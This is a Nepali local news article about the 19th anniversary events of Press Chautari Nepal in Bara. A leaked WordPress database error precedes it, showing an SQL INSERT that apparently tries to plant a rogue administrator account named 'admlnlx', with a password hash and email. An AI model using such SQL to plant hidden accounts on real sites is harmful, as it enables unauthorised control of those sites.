WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1VQ8V.rtYNT6gjegjsZJguzt4nmjO1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-26 00:29:03', '', 'admlnlx', 'admlnlx')
दुष्यान्त चौधरी,
बारा, माघ २२–
प्रेस चौतारी नेपाल बाराले विविध कार्यक्रमगरि आफ्नो १९ औं स्थापना दिवस मनाएको छ ।
स्थापना दिवसको अवसरमा आज विहान प्रभात फेरी आयोजना गर्नुको साथै विभिन्न पत्रकार सम्बद्ध संघसंगठनहरु बीच अन्तरक्रिया कार्यक्रम गरेको छ । कार्यक्रमलाई सम्बोधन गर्दै प्रेस चौतारी नेपालका केन्द्रिय सदस्य प्रकाश लम्सालले विशुद्ध संचारकर्मीको संगठन प्रेस चौतारी नेपाल मात्र रहेको दाबी गर्नुभयो । उहांले यस संगठन भित्र सक्रिय र दक्ष संचारकर्मीहरु रहेको जानकारी दिदै बोलेर होइन लेखेर समाजिक रुपान्तरणमा लाग्न आग्रह गर्नुभयो ।
प्रेस चौतारी नेपाल बाराका अध्यक्ष दिवाकर भण्डारीको अध्यक्षतामा सम्पन्न कार्यक्रममा पूर्व केन्द्रिय सदस्य लक्ष्मी साह, पत्रकार महासंघ बाराका अध्यक्ष कमल कुमार उपाध्याय, प्रेस सेन्टर पर्साका अध्यक्ष निरज पिठाकोटे, नेपाल आदिवासी जनजाति पत्रकार महासंघ (फोनिज) बाराका उपाध्यक्ष जियालाल चौधरी, महिला पत्रकार संजालकी अध्यक्ष सृजा थापा, थारु पत्रकार संघका सचिव चन्द्रशेखर चौधरी, मधेसी पत्रकार समाजका पन्नालाल दास, लगाएतको उपस्थिती रहेको थियो भने कार्यक्रममा अजय साहको सहजिकरण रहेको थियो ।